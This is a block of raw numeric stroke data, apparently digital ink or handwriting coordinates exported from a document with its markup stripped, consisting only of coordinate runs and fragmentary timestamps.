0,9 3 0,-9-4 0,4 0 0,-1-1 0,-2 1 0,2 0 0,-4-1 0,0-4 0,0-1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34:44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24575,'11'0'0,"-1"0"0,6 0 0,1 0 0,0 0 0,4 0 0,-9 0 0,3 0 0,-4 0 0,0 0 0,15 0 0,-12 0 0,17 0 0,-15 0 0,11 0 0,2 0 0,-1 0 0,-1 0 0,-6 0 0,5 10 0,-13-3 0,2 9 0,-15-6 0,0 1 0,0 0 0,0-1 0,0 1 0,0 4 0,0-3 0,0 4 0,0-6 0,0 1 0,0 19 0,0-15 0,-10 25 0,8-27 0,-13 7 0,9-5 0,0-3 0,-3 8 0,3-8 0,-5 4 0,5-6 0,-4-4 0,9 4 0,-14-4 0,3 0 0,0 3 0,-2-8 0,8 4 0,-5-5 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,5 0 0,1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5T14:40:50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24575,'61'0'0,"0"0"0,26 0 0,-20 0 0,12 0 0,-6 0-2069,-3 0 1,1 0 2068,-2 0 0,6 0 0,-3 0 0,17 0 0,-1 0 0,7 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-10 0 0,7 0 0,-14 0 0,9 0 0,1 0 0,-9 0 0,13 0 0,6 0 0,-16 3 0,17 0 0,9 2 0,0-1 0,-9 0 0,-16-1 0,16 0 0,-3 0 0,-3 2 0,14 1 0,-1 1 0,-15-3 0,-2-4 0,-11 0 550,-3 3 1,1 1-551,-9-2 0,3 1 0,-2 0 0,17 5 0,-3 0-150,1 0 0,-5 0 150,-25-4 0,-1 0 0,7 3 0,-3 1 0,14 0 0,15 7 0,-7-3 0,24 4 0,2-1 0,-18-3 0,-18-3 0,1 0 0,14 3 0,18 2 0,-2-1 0,-19-5 0,-23-7 0,-10-2 0,24 1 0,-20 0 0,0 0 2048,29 0-2048,-11-11 0,2-2 0,25 1 0,-31-4 0,-5 0 0,-13 3 0,38-6 0,-30 5 145,19-4-145,-24 5 1143,27-10-1143,-27 7 0,29-1 0,-44 1 0,14 3 0,-1-11 0,-5 5 0,1 2 0,-19 6 0,9-1 0,-6 0 0,7 0 0,0 1 0,15 0 0,-19 4 0,12-3 0,-8 9 0,6-10 0,12 5 0,-16-1 0,37-4 0,-36 4 0,20 0 0,-13 2 0,-19 5 0,11 0 0,-20 0 0,-7 0 0,-5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35:17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24575,'0'65'0,"0"-28"0,0 58 0,0-15 0,0-17 0,0 29 0,0-19 0,0-4 0,-6 9 0,11-14 0,-4-14 0,6 5 0,4-14 0,-10-9 0,9 2 0,-8-6 0,3-4 0,-5-1 0,0-2 0,4-9 0,-2 20 0,2-13 0,-4 8 0,10-16 0,-8-7 0,8-4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35:20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497 0 24575,'-11'0'0,"0"0"0,0 0 0,0 0 0,-5 10 0,4-3 0,-10 9 0,5 0 0,-6-3 0,0 3 0,0-5 0,0 6 0,-11 6 0,3 1 0,-9 4 0,17-16 0,-4 4 0,15-10 0,0 5 0,-7 4 0,6-8 0,-14 8 0,6-10 0,4 6 0,1-5 0,15-1 0,7 0 0,6 1 0,3 4 0,0 6 0,3-4 0,-1 4 0,4-1 0,-9-3 0,9 4 0,-9-5 0,4 0 0,5 10 0,-8-8 0,34 29 0,-30-26 0,20 15 0,-22-15 0,7 1 0,7 4 0,9 6 0,-13-8 0,6 6 0,-15-13 0,6 3 0,-6-4 0,0 0 0,-6-5 0,-4 3 0,4-7 0,-4 2 0,4-4 0,1 0 0,0 0 0,0 0 0,-6 5 0,5-4 0,-9 9 0,4-9 0,-5 4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35:22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24575,'0'11'0,"0"15"0,0 11 0,0 1 0,0 8 0,0-11 0,0 4 0,0-4 0,-5 19 0,4-25 0,-4 35 0,5-20 0,0 23 0,0-5 0,0 6 0,0-1 0,0 6 0,0-20 0,0 7 0,0-29 0,0 14 0,0-4 0,0 10 0,0-14 0,4 15 0,2-30 0,0 13 0,4-18 0,-9 4 0,9 6 0,-4 1 0,15 15 0,-8-13 0,8 1 0,-11-15 0,1-10 0,4 3 0,2-3 0,4 5 0,1-1 0,-1 1 0,1 0 0,11 0 0,-18-6 0,6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35:24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24575,'22'35'0,"-4"4"0,17-2 0,-14-4 0,16 16 0,-1-11 0,-13 8 0,5-10 0,-10 10 0,1-12 0,0 14 0,11 17 0,-10-4 0,11 24 0,-6-16 0,-6-8 0,4 5 0,-15-27 0,8 14 0,-4-12 0,2 3 0,3 16 0,-10-2 0,-2-13 0,-5 3 0,0-13 0,0 16 0,0 13 0,0-14 0,0-1 0,0-21 0,0 1 0,-10 20 0,-2-11 0,-20 15 0,17-29 0,-14 6 0,22-18 0,-13 3 0,12-4 0,-6 0 0,8-1 0,-5 1 0,0 0 0,5-1 0,2 1 0,4-5 0,0-1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35:45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46 24575,'26'0'0,"-13"0"0,32 0 0,-5 0 0,-13 0 0,20 0 0,-6 0 0,-7 0 0,6 0 0,-12 0 0,-5 0 0,4 0 0,-10 0 0,-2 0 0,1 0 0,-4 0 0,3 0 0,-4 0 0,4 0 0,-3 0 0,-6 0 0,-30 0 0,-11 0 0,-15 0 0,-19 0 0,1 0 0,-7 0 0,4 0 0,25 0 0,1 0 0,-20 11 0,22-9 0,-10 14 0,32-15 0,10 4 0,10-5 0,8 0 0,10 0 0,17 0 0,-8 0 0,14 0 0,1-6 0,10-1 0,-7 0 0,-4-4 0,-12 5 0,5 0 0,-8-4 0,6 9 0,-19-4 0,3 5 0,-4 0 0,4 0 0,-3 0 0,4 0 0,-1 0 0,-3-5 0,3 4 0,6-4 0,-7 5 0,12 0 0,-9 0 0,10 0 0,-4-5 0,-2 4 0,-10-4 0,-7 5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35:48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3024 1 24575,'-17'0'0,"-7"0"0,-25 0 0,0 0 0,-15 0 0,17 0 0,-32 0 0,18 0 0,-6 0 0,-5 0 0,16 3 0,-1 2 0,-19 3 0,-1 4 0,11 1 0,1 5 0,1 4 0,0 3 0,1 2 0,0 2 0,1 2 0,3 1 0,14-3 0,3-1 0,-30 18 0,5 20 0,1-1 0,22-20 0,-2 2 0,3 0 0,2 2 0,-4 7 0,2 0 0,3-5 0,2 0 0,-2 9 0,1-2 0,5-14 0,1-1 0,-4 7 0,-2 2 0,-3 2 0,0 1 0,5-2 0,1 0 0,-2 1 0,2-2 0,-14 24 0,22-34 0,1 0 0,-18 29 0,2-2 0,18-15 0,-9-6 0,6 16 0,-4-10 0,12-5 0,-1 4 0,-1-4 0,-1 0 0,2 2 0,0 0 0,-3 0 0,1-2 0,-1 12 0,5-7 0,2-1 0,0-2 0,4-13 0,-8 9 0,8-16 0,3 2 0,0-6 0,8-11 0,-2 0 0,4-10 0,0-1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35:50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24575,'0'10'0,"0"11"0,0-7 0,0 7 0,0-5 0,0 1 0,0 7 0,0-1 0,0 0 0,0-5 0,0 8 0,0-8 0,0 9 0,0-5 0,0-1 0,5-9 0,-4 2 0,4-8 0,0 0 0,-4 4 0,4-5 0,-1 1 0,-2 4 0,2-4 0,-4 5 0,5-5 0,-4 3 0,4-3 0,0 0 0,-4 3 0,9-7 0,-4 2 0,4-4 0,1 0 0,0 0 0,-1 0 0,6-4 0,0-7 0,7-2 0,-7-2 0,17-7 0,-19 8 0,13-8 0,-6 6 0,-8 9 0,8-8 0,-10 9 0,-1 0 0,11-3 0,-4 3 0,5-10 0,-2 4 0,-3-4 0,4 1 0,0 3 0,1-4 0,-1 5 0,1 0 0,-6 1 0,0-1 0,-6 5 0,-4-4 0,4 9 0,-9-4 0,4 5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35:56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24575,'10'0'0,"11"0"0,-2 0 0,9 0 0,6 0 0,-14 0 0,12 0 0,-10 0 0,-3 0 0,8 0 0,-10 0 0,1 0 0,-2 0 0,4 0 0,-11 0 0,5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35:57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24575,'38'0'0,"-9"0"0,24 0 0,-15 0 0,-1 0 0,11 0 0,-8 0 0,-4 0 0,-8 0 0,-16 0 0,3 0 0,-9 0 0,-1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35:58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731 0 24575,'-17'0'0,"2"0"0,-1 0 0,-6 0 0,-1 0 0,-16 0 0,20 0 0,-18 0 0,13 0 0,-5 0 0,-9 0 0,12 5 0,-12 6 0,9 13 0,-6 5 0,-5 6 0,3-1 0,-3 6 0,6-4 0,4 9 0,-4-4 0,15-5 0,-8 18 0,9-21 0,0 17 0,7-6 0,1-13 0,9 12 0,-4-20 0,5 9 0,0-4 0,0 6 0,5 6 0,7-10 0,27 30 0,-11-36 0,31 34 0,-27-38 0,18 14 0,-9-12 0,5 2 0,7-1 0,-5-5 0,5-6 0,3-1 0,2-5 0,-15 1 0,-3-2 0,-23-5 0,4 0 0,-4 0 0,13 0 0,-16 0 0,16 0 0,-18 0 0,3-5 0,0 4 0,2-9 0,14-1 0,-2-1 0,-2 1 0,-12 2 0,-5 8 0,-9-9 0,9 9 0,-9-9 0,8 9 0,-8-4 0,4 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5T14:40:52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8191,'0'57'0,"0"20"5063,0-27-5063,0 21 2818,0-24-2818,0 5 1719,0-13-1719,0 37 6784,0-37-6784,0 45 0,0-15 0,0-2 0,0 9 0,0-39 0,0 1 0,0-19 0,0-9 0,0-11 0,10-25 0,3 6 0,10-13 0,0 10 0,-5-1 0,21-10 0,-17 8 0,13-9 0,-3 1 0,-1 3 0,10-9 0,-12 16 0,-7 2 0,-7 11 0,-3 1 0,13 4 0,-12 1 0,17 5 0,-2 27 0,3 13 0,-2 9 0,-2 4 0,3 24 0,11 7 0,-24-49 0,-1 6 0,-4-29 0,3 17 0,1-29 0,-4 0 0,3 0 0,1-5 0,6-11 0,-4-3 0,9-9 0,1-11 0,-3 18 0,12-11 0,-24 26 0,1 1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36:07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24575,'46'0'0,"-17"0"0,31 0 0,-33 0 0,26 0 0,-19 0 0,14 0 0,-12 0 0,0 0 0,-3 0 0,-4 0 0,-7 0 0,-7 0 0,-4 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-5 0 0,-2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36:14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2989 0 24575,'-17'0'0,"-41"0"0,-16 0 0,-22 0 0,39 0 0,0 0 0,-30 0 0,34 0 0,-1 0 0,1 0 0,-1 0 0,-9 0 0,-2 0 0,0 0 0,0 0 0,-3 0 0,1 0 0,5 0 0,0 0 0,-2 0 0,1 0 0,10 0 0,2 0 0,-46 0 0,11 0 0,-6 0 0,11 3 0,-4 0 0,24 0 0,-1 1 0,-28 7 0,1 3 0,35-4 0,3 2 0,1 1 0,0 0 0,-2 0 0,2 0 0,-42 8 0,41-9 0,-1 2 0,-13 5 0,2-1 0,-18 4 0,3 6 0,45-21 0,22 2 0,7-3 0,4 0 0,0-1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36:16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1 24575,'-21'5'0,"1"13"0,-3-5 0,0 10 0,-6-6 0,3 1 0,-3 5 0,-3 5 0,6-4 0,-9 15 0,2-14 0,14 13 0,-2-20 0,4 9 0,10-11 0,-3 1 0,10-1 0,0-6 0,0 1 0,4-5 0,13 4 0,12-4 0,12 6 0,-5 0 0,-3-1 0,14 7 0,32 17 0,-20-12 0,-7 0 0,-4-1 0,-18-8 0,25 8 0,-32-15 0,4 3 0,-5-9 0,-1 4 0,1-1 0,-6-2 0,-5 7 0,-6-8 0,-5 4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36:18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721 0 24575,'-11'0'0,"-21"0"0,16 0 0,-15 0 0,10 0 0,2 0 0,-10 0 0,-5 0 0,3 0 0,-11 0 0,6 0 0,0 0 0,-12 6 0,15 0 0,-7 6 0,-4 15 0,5-7 0,-12 13 0,11-10 0,12-1 0,5 0 0,8-1 0,4 15 0,5-16 0,1 30 0,5-28 0,0 10 0,0 1 0,0-8 0,5 20 0,6-16 0,6 9 0,0-15 0,9 9 0,-13-14 0,7-3 0,-10-5 0,15 0 0,-6 2 0,12 4 0,-8-10 0,-7-2 0,21 1 0,-5-3 0,14 3 0,-7-5 0,-5 0 0,-6 0 0,5 0 0,-11 0 0,11 0 0,-5 0 0,6 0 0,5 0 0,-14 0 0,0 0 0,-14 0 0,9 0 0,-7 0 0,8 0 0,-11 0 0,1-5 0,0-1 0,-1 0 0,1 1 0,-5 5 0,-1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36:24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981 1 24575,'-30'0'0,"2"0"0,-18 0 0,10 0 0,-26 0 0,6 0 0,0 0 0,-18 0 0,25 0 0,-22 0 0,12 0 0,-34 11 0,36-3 0,-23 31 0,52-22 0,-17 37 0,21-28 0,-4 24 0,10-15 0,1 10 0,5-4 0,6 5 0,0-3 0,6-2 0,0 24 0,0-21 0,0 31 0,6 7 0,6-14 0,6 18 0,0-44 0,-1-8 0,-1-6 0,2 1 0,9 9 0,-8-7 0,6 1 0,-8-10 0,4-1 0,-4-4 0,3-2 0,-3-9 0,4 4 0,1-9 0,5 4 0,-4-5 0,32 0 0,-15 0 0,40 0 0,-39 0 0,19 0 0,-24 0 0,17-5 0,5-12 0,-8 2 0,0-7 0,-11 1 0,-15 12 0,12-16 0,-23 23 0,12-12 0,-14 8 0,5-5 0,-5 5 0,-1-4 0,1 4 0,0 0 0,4-8 0,-3 11 0,8-11 0,-8 13 0,8-4 0,-13 5 0,3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36:26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24575,'0'11'0,"-5"4"0,-2 9 0,1 0 0,-10 17 0,1-1 0,2-2 0,-5 22 0,5-1 0,5 2 0,-9 0 0,10-6 0,-7 27 0,7-10 0,4 1 0,0-2 0,3-10 0,0 5 0,0 2 0,0 8 0,0 11 0,0-15 0,0-24 0,0-1 0,0 8 0,0-16 0,0 24 0,0-41 0,0 36 0,6-31 0,5 16 0,7-12 0,0-1 0,11 16 0,-4-2 0,2 0 0,0-2 0,-2-1 0,10 11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36:28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24575,'0'60'0,"6"2"0,8 9 0,0-18 0,7 24 0,5-6 0,-9-3 0,16 13 0,-24-11 0,14 10 0,-8 13 0,-1-8 0,3 2 0,2 1 0,-10-37 0,-1 0 0,9 36 0,-1-1 0,-2 6 0,-3 1 0,-10-39 0,4 9 0,-5-21 0,0-2 0,0 2 0,0 4 0,0-12 0,0 14 0,0 0 0,0 2 0,-11 11 0,3-17 0,-19 16 0,13-26 0,-13 15 0,15-26 0,1-3 0,7-9 0,4-5 0,0-2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36:3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1 896 24575,'0'-43'0,"0"11"0,0-43 0,0 36 0,0-37 0,0 20 0,0-1 0,0 7 0,0-10 0,0 25 0,0-20 0,5 7 0,-4 14 0,4-23 0,-5 19 0,5-9 0,1 13 0,0 11 0,-1 8 0,-1 4 0,2 5 0,5 1 0,0 10 0,0 6 0,0 7 0,7 28 0,1 14 0,1 7 0,-1 4 0,1 15 0,-4-20 0,1 1 0,-5-14 0,0-2 0,3 9 0,1-2 0,7 29 0,-9-21 0,3 6 0,-7-32 0,-9-34 0,4-1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36:32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24575,'11'0'0,"0"0"0,-1 0 0,11 0 0,-8 0 0,7 0 0,-5 0 0,-3 0 0,4 0 0,-1 0 0,-3 0 0,4-11 0,-5 9 0,0-9 0,-1 11 0,1 0 0,0-4 0,-1-2 0,1 0 0,0 1 0,-5 5 0,-1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36:33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24575,'0'23'0,"0"1"0,0 9 0,0-1 0,0-2 0,0-2 0,0-4 0,0 12 0,0 1 0,0 3 0,0 5 0,0-19 0,0 11 0,0-15 0,0 2 0,0 7 0,0-18 0,0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5T14:40:55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130 308 24575,'5'-11'0,"1"-5"0,10-18 0,-3 12 0,-2-15 0,-6 24 0,-5-9 0,0 10 0,0-9 0,0 9 0,-5-4 0,4 5 0,-9 1 0,0-1 0,-7 5 0,0 1 0,1 5 0,1 0 0,-7 0 0,-1 10 0,6-3 0,2 14 0,14 7 0,-9 14 0,8 12 0,-3 1 0,5-13 0,0-8 0,0-12 0,0 11 0,0-14 0,0 7 0,5-11 0,6-3 0,31 14 0,-8-12 0,10 2 0,-8-6 0,-5-9 0,19 5 0,4-12 0,5-11 0,-15-2 0,23-32 0,-27 12 0,23-19 0,-16 12 0,-5-8 0,-8 12 0,-5 1 0,-12 14 0,-7 1 0,-5 8 0,-5-3 0,0 10 0,0 0 0,0 1 0,-5 4 0,-1 1 0,-10 5 0,-11 0 0,6 0 0,-5 0 0,5 5 0,3 0 0,-9 11 0,10 1 0,1 4 0,6 6 0,-2 12 0,6-3 0,1-2 0,5-8 0,0-5 0,0-3 0,0 2 0,0-9 0,0-1 0,9 1 0,3-5 0,5-1 0,-2 0 0,1-4 0,1 4 0,-1-5 0,0 0 0,-6-5 0,6-12 0,-3-12 0,3-12 0,-4-6 0,-1 6 0,0 7 0,-4 12 0,2 11 0,-3 6 0,10 5 0,-5 0 0,20 5 0,-1 17 0,17 15 0,-5 11 0,-2 4 0,1-2 0,21 24 0,-51-69 0,0-15 0,1-34 0,0-10 0,0-29 0,0 21 0,-5 2 0,-2 25 0,0-3 0,-4 25 0,4-1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36:35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24575,'10'0'0,"6"0"0,-4 0 0,3 0 0,-4 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-5 5 0,-1 1 0,-1 0 0,-2 3 0,2-3 0,-4 5 0,0 0 0,0 4 0,0-3 0,0 8 0,0-8 0,0 3 0,0-4 0,0 5 0,0-5 0,0 14 0,0-12 0,0 8 0,-4-11 0,-2-4 0,0 4 0,-9-9 0,3 4 0,-5-5 0,2 0 0,9 4 0,1 2 0,5 5 0,0-5 0,0-1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36:37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24575,'4'6'0,"-2"4"0,7-4 0,-8 4 0,4 1 0,0 0 0,-4-1 0,8-4 0,-7 4 0,2-14 0,-4 3 0,0-15 0,0-6 0,0 4 0,-4-3 0,2 5 0,-2-1 0,4 0 0,0 2 0,0-1 0,0 4 0,4-4 0,-2 6 0,7-1 0,-3 5 0,0 1 0,-1 5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36:3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24575,'0'16'0,"0"6"0,0-3 0,0 2 0,0 0 0,0-8 0,0 8 0,0-5 0,0-4 0,0 3 0,0-4 0,0-1 0,5-4 0,-4-1 0,4-5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36:40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36:41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24575,'4'0'0,"-1"15"0,19-6 0,-10 18 0,10-4 0,-10 1 0,4-2 0,1 5 0,-5-14 0,3 13 0,-4-14 0,-5 3 0,4-4 0,-5 0 0,6 4 0,0-8 0,4 12 0,-3-16 0,-1 11 0,-2-13 0,-7-1 0,2-22 0,7-15 0,-8-1 0,18-29 0,-14 37 0,10-21 0,-10 28 0,3 5 0,6-19 0,-3 16 0,8-12 0,-10 13 0,-1 3 0,1 0 0,0-3 0,0 8 0,-6 1 0,0 6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36:43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24575,'14'0'0,"3"0"0,25 0 0,27 0 0,-17 0 0,26 0 0,2 0 0,-27 0 0,12 0 0,-36 0 0,-12 0 0,-6 0 0,-6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36:43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24575,'24'0'0,"5"0"0,2 0 0,31 0 0,-18 0 0,24 0 0,-21 0 0,16 0 0,-14 0 0,23 0 0,-36 0 0,1 0 0,-27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36:44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24575,'0'24'0,"0"5"0,0 28 0,0 11 0,0 25 0,0-31 0,0 0 0,0-8 0,0 1 0,0 11 0,0 4 0,0 20 0,0 5 0,-2-21 0,-1 3 0,1-2 0,1-5 0,0-1 0,1 1 0,2 10 0,0 2 0,0-12 0,0 20 0,10-1 0,-12-60 0,0-61 0,0 26 0,0-36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36:46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0 24575,'-23'6'0,"-9"18"0,-1-8 0,-10 26 0,-18 8 0,26-18 0,-23 20 0,40-40 0,-5 5 0,-5-1 0,-1 7 0,-5 1 0,-1 4 0,1-5 0,0 0 0,-6 0 0,10-5 0,-3 4 0,10-5 0,1-6 0,5 4 0,1-9 0,-1 5 0,-11 5 0,2 2 0,-8 0 0,11-1 0,-5-1 0,4 1 0,2 0 0,6-6 0,15-1 0,8-4 0,21 16 0,22 16 0,-3 2 0,18 13 0,-19 3 0,22 15 0,-25-10 0,9 11 0,-10 1 0,-18-20 0,7 5 0,0-1 0,-6-9 0,0-2 0,1 0 0,0 4 0,2-1 0,-5-3 0,-6-18 0,-6-5 0,-6-8 0,-5-9 0,0-1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38:04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24575,'63'0'0,"7"0"0,3-14 0,-21 13 0,2-1 0,-2-8 0,3-1 0,24 6 0,-1 2 0,16-6 0,-41 5 0,-3 2 0,5 2 0,-11-6 0,-2 5 0,-14-4 0,-1 5 0,17 0 0,-10 0 0,36 0 0,-42 0 0,20 0 0,-30 0 0,7 0 0,-13 0 0,4 0 0,-6 0 0,1 0 0,0 0 0,-1 0 0,-4-5 0,-1 4 0,-5-4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5T14:37:26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1 137 24575,'22'0'0,"28"0"0,35 1 0,13-2 0,-12-3 0,6-1-1986,-21 4 0,7 1 0,2 0 0,-3-1 1986,13-2 0,-1 0 0,2 0-729,-10 2 0,3 2 0,1-1 0,1 0 729,2 0 0,1 0 0,1 0 0,2 0-305,-12 0 0,2 0 0,1 0 0,0 0 0,-1 0 305,17 0 0,0 0 0,0 0 0,1 0 0,-15 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,12 0 0,-5 0 0,6 0 0,12 0 0,-32 0 0,8 0 0,6 0 0,5 0 0,2 0 0,2 0 0,-1 0 0,-2 0 0,-3 0 0,-6 0-384,13 0 1,-4 0 0,-3 0 0,-1 0 0,0 0 0,3 0 0,4 0 383,-8 0 0,3 0 0,4 0 0,1 0 0,0 0 0,-2 0 0,-3 0 0,-3 0 0,-6 0 84,6 0 1,-3 0 0,-4 0 0,-4 0 0,-2 0 0,-1 0-85,15 0 0,-5 0 0,-2 0 0,3 0 348,9 0 0,1 1 1,0-1-1,0-1-348,-3 0 0,0-1 0,-2 0 0,-1-1 661,-9-1 1,0-1 0,-3 0-1,-6-1-661,-1-2 0,-6-1 0,0-1 1645,-1-1 0,-1-1 0,-4 2-1645,2 1 0,-8 1 0,10-4 2507,-34 12-2507,-6 0 2024,-12 0-2024,11 0 1053,-10 0-1053,-4 0 0,-2 0 0,-5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5T14:40:5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24575,'0'22'0,"0"-3"0,0 34 0,0 7 0,0-7 0,0 15 0,0-19 0,0 8 0,0 6 0,5-2 0,2 4 0,2-14 0,2 3 0,2 29 0,1-2 0,6 0 0,-10-19 0,-10-32 0,0-16 0,0 7 0,0-17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42:48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863 1 24575,'-78'0'0,"10"0"0,-11 0 0,-2 0 0,-6 0 0,12 4 0,4 3 0,18 1 0,-10 29 0,13-3 0,-8 17 0,23-2 0,22-1 0,3 0 0,10-7 0,10 4 0,26-8 0,23-1 0,33 2 0,-37-16 0,0 0 0,24 8 0,3 10 0,-50-27 0,1 9 0,-16-5 0,-6 4 0,-6 0 0,-5 1 0,-6 17 0,-34 3 0,-9 2 0,-2 12 0,-12-8 0,-1-7 0,15-19 0,-23 7 0,20-15 0,-10-1 0,14-3 0,18-9 0,14 5 0,11-6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42:49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628 1 24575,'-17'0'0,"5"0"0,-26 0 0,-8 0 0,-7 0 0,-2 0 0,13 0 0,-7 0 0,5 0 0,2 5 0,18 1 0,7 5 0,1 10 0,-1 3 0,4 15 0,3-9 0,10 8 0,0-10 0,0 12 0,33 2 0,4 13 0,6-23 0,4-2 0,11 18 0,6-7 0,-27-17 0,2 9 0,8 8 0,-15-5 0,-9-6 0,-23-19 0,0 4 0,0-3 0,0 3 0,-15 1 0,-9 2 0,-24 5 0,-3-10 0,-3-2 0,-26 2 0,27-7 0,3-1 0,-4-5 0,12 0 0,-1 0 0,8 0 0,7 0 0,17 0 0,6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42:51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24575,'0'37'0,"0"49"0,0-29 0,0 37 0,0-23 0,0-5 0,0-1 0,0 5 0,0-18 0,0 9 0,0-20 0,0-8 0,0-12 0,5-9 0,1-2 0,4-10 0,11 0 0,4 0 0,19 0 0,27 0 0,-11 0 0,27-7 0,1-7 0,-26-1 0,22-5 0,-34 8 0,-10 5 0,-10 1 0,-21 6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42:52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24575,'0'88'0,"0"-9"0,0 21 0,0-15 0,0 2 0,0-35 0,0-1 0,0 21 0,0 0 0,0-15 0,0-6 0,0 7 0,0 39 0,0-38 0,0-26 0,0-6 0,0-21 0,0-1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42:53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24575,'0'61'0,"0"-6"0,0 33 0,0-27 0,0 0 0,0 23 0,0-27 0,0 0 0,0 37 0,0-25 0,0 19 0,0-26 0,0-15 0,0-2 0,0-4 0,0 6 0,0-15 0,0-1 0,0-20 0,0 5 0,0-5 0,0 0 0,0-6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42:53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24575,'36'0'0,"5"0"0,-7 0 0,15 0 0,-14 0 0,5 0 0,7 0 0,-26 0 0,0 0 0,-16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42:57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99 992 24575,'11'0'0,"-5"-5"0,-2-1 0,-4-5 0,0-5 0,0-6 0,0-3 0,0-3 0,0 5 0,0 5 0,0 1 0,0 7 0,0-1 0,-4 5 0,-2 1 0,-5 5 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,4 5 0,-4-4 0,9 8 0,-4 2 0,5 1 0,-5 8 0,4-2 0,-9 14 0,9 9 0,-5-9 0,6 5 0,0-20 0,0 6 0,10 9 0,-3-13 0,24 22 0,-7-21 0,15 12 0,-11-15 0,-1-1 0,-5-10 0,-1-1 0,0-5 0,1-11 0,5-27 0,-1-9 0,6-8 0,-6 0 0,-2-4 0,9-35 0,-16 22 0,-1 10 0,1-4 0,-6 14 0,0 2 0,10-37 0,-8 28 0,-1 1 0,-4-7 0,-1 16 0,-2-2 0,-5-38 0,0 34 0,0-5 0,0 72 0,0 32 0,0 13 0,0-8 0,0 3-218,0 34 0,0 7 218,0-24 0,0 2 0,0-1 0,0 25 0,0 0-682,0-18 1,0 2-1,0-6 682,0 3 0,0-3 0,-1 5 0,2-3 0,2-23 0,0-3 0,-3 8 0,1-5 0,10 8 0,-5-35 391,6-9-391,-2-11 2090,7-42-2090,-1-19 0,0-9 0,-1 2 0,0-3 0,6-26 0,-1 0 0,-6 27 0,-1 4 0,1 1 0,-1 4 0,8-21 0,-2 1 0,0 13 0,-10-20 0,-3 32 0,-1-1 0,-5-35 0,0 5 0,0 39 0,0 11 0,0 16 0,-5 10 0,-1 1 0,0 10 0,1 1 0,5 9 0,0-3 0,0 16 0,0 21 0,0 2 0,-6 20 0,5 6 0,-5 0 0,6 15 0,0-23 0,0-3 0,0-1 0,5-2 0,8 8 0,6-10 0,4-7 0,-4-11 0,-3-10 0,0-10 0,1-1 0,5-10 0,0-3 0,15-36 0,-9 4 0,17-66 0,-18 24 0,-11 12 0,-1-1 0,4-17 0,-6 3 0,-8 26 0,-5 14 0,0 22 0,0 83 0,0-20 0,0-3 0,0 4 0,6 36 0,2-32 0,-1 24 0,9-36 0,-13-5 0,12-11 0,-9-12 0,5-12 0,-1-10 0,2-34 0,0-37 0,-5-18 0,-4 38 0,-1 1 0,-2-20 0,0 16 0,0 14 0,-10 7 0,3 9 0,-8 9 0,-1 5 0,4 9 0,-4-4 0,6 5 0,-1 0 0,5 0 0,1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42:58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2937 29 15174,'-23'0'0,"0"0"3984,-46 0-3984,12 0 0,7 0 0,-5 0 0,-6 0 0,-2 0 0,8 0 0,-1 0 812,-11 0 0,-1 0-812,-4 0 0,5 0 0,-4 0 0,14 0 0,2 0 0,5 0 877,-38 0-877,-4 0 1458,39 0 0,-2 0-1458,-17 0 0,1 0 0,16 0 0,1 0 0,-16 0 0,-4 0 0,-3 0 0,-1 0 0,5 0 0,-3 0 0,9 1 0,-4-1 0,-2-1 0,-8-2 0,-1-2 0,4 1 0,-12 2 0,4 0 0,-12-4 0,11 0 0,22 6 0,30 0 0,24 0 0,6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43:00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0 24575,'-18'0'0,"-9"5"0,2 7 0,6 6 0,-20 6 0,23-1 0,-19-5 0,17-1 0,-4-1 0,10-4 0,-4 5 0,5-1 0,-20 6 0,14 2 0,-14-2 0,20-6 0,5-5 0,1 4 0,5-3 0,0 4 0,0-5 0,0 4 0,0 2 0,26 26 0,9 3 0,-2-7 0,4 3 0,7 0 0,1 0 0,-3 3 0,2-1 0,8 3 0,0-2 0,22 21 0,-3-3 0,-24-21 0,-23-18 0,-9-9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43:10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1 313 24575,'29'0'0,"50"-13"0,4-5-1267,-21 2 0,3 1 1267,-5 6 0,4 0 0,-1-1 0,6 0 0,-2 0 0,10 0 0,1 1 0,-11 0 0,5 0 0,-2 0 0,29-4 0,0 1 0,-32 3 0,1 0 0,0 2 0,3 2 0,0 2 0,-2-1 0,20-3 0,-1-1 0,5 0 0,-1 1 210,-17 1 1,2 1-211,-5-1 0,3 1 0,0-1 0,24-5 0,-5 1 0,-24 9 0,-1-1 253,8-5 1,-9 1-254,-18 6 0,3 0 0,-37 0 0,-11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5T14:40:57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1 175 24575,'10'-21'0,"3"2"0,52-37 0,-36 32 0,34-14 0,-45 28 0,0 8 0,4-3 0,-5 5 0,1 0 0,4 0 0,-5 0 0,17 0 0,2 16 0,5-3 0,2 24 0,-18-17 0,0 9 0,-19-17 0,3 8 0,-8-3 0,4 0 0,-5 34 0,-6 22 0,-11 13 0,-3-4 0,-4-37 0,-4-10 0,8-10 0,-13 13 0,-19-1 0,17-6 0,-43 2 0,43-25 0,-21 2 0,27-10 0,7 0 0,11 5 0,6-4 0,5 4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43:11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24575,'30'0'0,"8"0"0,33 0 0,-17 6 0,-2-3 0,-1 2 0,4 8 0,19-5 0,8 5 0,-41-6 0,36 12 0,-29-6 0,-14 0 0,5-4 0,-27-3 0,-2 5 0,-10 16 0,-11 10 0,-20 18 0,-15 7 0,-18 2 0,-5-12 0,16-9 0,4-18 0,-1 8 0,21-17 0,-9 15 0,22-19 0,10-1 0,1-6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43:12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0 24575,'-24'0'0,"-3"0"0,-7 0 0,0 0 0,-3 0 0,-14 0 0,33 0 0,-27 0 0,27 0 0,-10 0 0,9 0 0,-2 0 0,10 5 0,5 6 0,-4 6 0,9 9 0,-4 3 0,5 0 0,0-7 0,0 10 0,0-18 0,5 33 0,7-16 0,1 16 0,4-11 0,5 3 0,-3-8 0,9 3 0,-6-7 0,-1-6 0,6-4 0,7 4 0,6-8 0,-4-2 0,11-6 0,-15-5 0,18 0 0,-9 0 0,-5-5 0,-8-1 0,8-15 0,-25 12 0,13-6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43:14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80 213 24575,'17'0'0,"11"0"0,-2 0 0,9-5 0,-12-1 0,-5-5 0,3-1 0,-13 2 0,2-2 0,-10-4 0,0 4 0,0-10 0,0 10 0,0-10 0,-10 10 0,-3-9 0,-5 9 0,-3-5 0,9 11 0,-4 2 